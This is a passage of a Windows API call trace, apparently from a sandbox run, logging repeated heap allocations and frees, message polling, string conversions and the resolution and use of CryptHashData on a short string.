HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0247.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0247.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.840] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0247.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0247.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0247.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55008, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0247.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0247.844] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0247.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51718, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.845] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.845] CryptHashData (hHash=0xa87250, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0247.845] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0247.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0247.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0247.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0247.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0247.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0247.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.846] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0247.847] HeapFree 